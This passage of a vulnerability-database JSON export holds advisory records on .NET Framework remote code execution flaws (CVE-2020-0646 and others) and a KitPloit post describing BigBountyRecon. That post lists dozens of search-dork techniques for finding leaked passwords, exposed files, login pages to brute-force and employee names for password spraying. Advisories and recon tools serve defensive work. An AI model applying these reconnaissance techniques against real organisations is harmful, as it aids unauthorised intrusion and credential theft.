"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-0646", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-07-30T00:00:00", "id": "AKB:2A3F116D-DC02-4BEA-B9AD-39F7773274AE", "href": "https://attackerkb.com/topics/79GOZOJWWk/cve-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-12-22T23:41:02", "description": "### *Detect date*:\n01/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Developer Tools. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\n.NET Core 3.0 \nASP.NET Core 3.0 \nASP.NET Core 2.1 \nMicrosoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 AND 4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.7.2 \nMicrosoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 4.8 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 AND 4.8 \n.NET Core 3.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 3.0 Service Pack 2 \nASP.NET Core 3.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0603](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0603>) \n[CVE-2020-0602](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0602>) \n[CVE-2020-0605](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0605>) \n[CVE-2020-0646](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0646>) \n[CVE-2020-0606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0606>) 
\n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2020-0603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0603>)9.3Critical \n[CVE-2020-0602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0602>)5.0Critical \n[CVE-2020-0605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605>)9.3Critical \n[CVE-2020-0606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0606>)9.3Critical\n\n### *KB list*:\n[4535101](<http://support.microsoft.com/kb/4535101>) \n[4534306](<http://support.microsoft.com/kb/4534306>) \n[4534978](<http://support.microsoft.com/kb/4534978>) \n[4534976](<http://support.microsoft.com/kb/4534976>) \n[4532933](<http://support.microsoft.com/kb/4532933>) \n[4534276](<http://support.microsoft.com/kb/4534276>) \n[4532938](<http://support.microsoft.com/kb/4532938>) \n[4532936](<http://support.microsoft.com/kb/4532936>) \n[4534271](<http://support.microsoft.com/kb/4534271>) \n[4534979](<http://support.microsoft.com/kb/4534979>) \n[4532935](<http://support.microsoft.com/kb/4532935>) \n[4535103](<http://support.microsoft.com/kb/4535103>) \n[4535104](<http://support.microsoft.com/kb/4535104>) \n[4535105](<http://support.microsoft.com/kb/4535105>) \n[4534293](<http://support.microsoft.com/kb/4534293>) \n[4534977](<http://support.microsoft.com/kb/4534977>) \n[4535102](<http://support.microsoft.com/kb/4535102>) \n[4556826](<http://support.microsoft.com/kb/4556826>) \n[4556813](<http://support.microsoft.com/kb/4556813>) \n[4556812](<http://support.microsoft.com/kb/4556812>) \n[4556807](<http://support.microsoft.com/kb/4556807>) \n[4556406](<http://support.microsoft.com/kb/4556406>) \n[4556405](<http://support.microsoft.com/kb/4556405>) \n[4556404](<http://support.microsoft.com/kb/4556404>) \n[4556403](<http://support.microsoft.com/kb/4556403>) \n[4556402](<http://support.microsoft.com/kb/4556402>) 
\n[4556401](<http://support.microsoft.com/kb/4556401>) \n[4556400](<http://support.microsoft.com/kb/4556400>) \n[4556441](<http://support.microsoft.com/kb/4556441>) \n[4552929](<http://support.microsoft.com/kb/4552929>) \n[4552926](<http://support.microsoft.com/kb/4552926>) \n[4552931](<http://support.microsoft.com/kb/4552931>) \n[4556399](<http://support.microsoft.com/kb/4556399>) \n[4552928](<http://support.microsoft.com/kb/4552928>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "kaspersky", "title": "KLA11634 Multiple vulnerabilities in Microsoft Developer Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-07-17T00:00:00", "id": "KLA11634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11634/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:58", "description": "A remote code execution vulnerability exists in Microsoft .NET 
Framework. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-05T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft .NET Framework Remote Code Execution (CVE-2020-0646)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-04-05T00:00:00", "id": "CPAI-2020-0216", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:27", "description": "A remote code execution vulnerability exists in Microsoft .NET Framework XPS File Parsing. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-25T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft .NET Framework XPS File Parsing Remote Code Execution (CVE-2020-0605)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-1031", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:18", "description": "[](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any [penetration testing](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. 
It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation.\n\nThis tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target.\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n**Techniques** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure.\n\n 2. Configuration Files: Oftentimes configuration files contain sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privileged access to the internal resources.\n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information.\n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related\n\n 5. 
Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens.\n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records.\n\n 7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or try [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources.\n\n 8. SQL Errors: SQL errors leak sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection.\n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application.\n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files.\n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX.\n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information.\n\n 13. 
phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make an attacker's life easier when targeting applications using newly discovered exploits.\n\n 14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page.\n\n 15. Install/Setup Files: Such files allow an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit.\n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues.\n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\".\n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen.\n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response.\n\n 20. GitLab: Quickly look for sensitive information on the GitLab.\n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation.\n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack.\n\n 23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration.\n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. 
There are numerous tools available to automate the process of subdomain enumeration.\n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork.\n\n 26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders.\n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure.\n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information.\n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow.\n\n 30. Find WordPress related exposure using Wayback Machine: Look for archived WordPress files using WaybackMachine.\n\n 31. GitHub: Quickly look for sensitive information on the GitHub.\n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website.\n\n 33. Reddit: Information about the particular organisation on the Reddit platform.\n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation.\n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains.\n\n 36. .git Folder: Source code exposure. It's possible to download the entire repository content if accessible.\n\n 37. YouTube: Look for any recent news on Youtube.\n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures.\n\n 39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities.\n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities.\n\n 41. .SWF File (Wayback Machine): Flash is dead. 
We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities.\n\n 42. Wayback Machine: Look for archived files to access old files.\n\n 43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation.\n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services.\n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru\n\n 46. s3 Buckets: Open s3 buckets.\n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code.\n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys.\n\n 49. Shodan: Search engine for Internet-connected devices\n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint.\n\n 51. API Endpoints: Find WSDL files.\n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes.\n\n 53. CT Logs: [Certificate Transparency](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation.\n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks.\n\n 55. 
What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research.\n\n \n**Screenshots** \n\n\nSearch for plaintext passwords for a target organisation:\n\n \n\n\n[](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation:\n\n \n\n\n[](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets:\n\n \n\n\n[](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying whether the URL contains the \".do\" extension:\n\n \n\n\n[](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n**How to use this tool?** \n\n\nStep1: Download the file from Release section: <https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe>\n\nStep2: Run the EXE file\n\nStep3: Enter the target domain\n\nStep4: Click on different buttons in the tool to find information\n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead\n\n \n**Questions?** \n\n\nTwitter: <https://twitter.com/maniarviral> \nLinkedIn: <https://au.linkedin.com/in/viralmaniar>\n\n \n**Dorking operators across Google, DuckDuckGo, Yahoo and Bing** \n\n\nTable obtained from: <https://exposingtheinvisible.org/guides/google-dorking/>\n\nHere is a table with possible dorks for various search engines.\n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. 
| \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. | \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. | \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. <https://en.wikipedia.org/wiki/ISO_3166-1> | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. 
rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. | \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n**Contribution**\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n**[Download BigBountyRecon](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-18T20:30:00", "type": "kitploit", "title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:12", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nTo exploit the vulnerability, an attacker would need to pass specific input to an application utilizing susceptible .Net methods.\n\nThe security update addresses the vulnerability by correcting how the Microsoft .NET Framework validates input.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Injection Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0646", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:13", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. 
In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606"], "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0606", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:13", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. 
If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2020-06-25T07:00:00", "id": "MS:CVE-2020-0605", "href": 
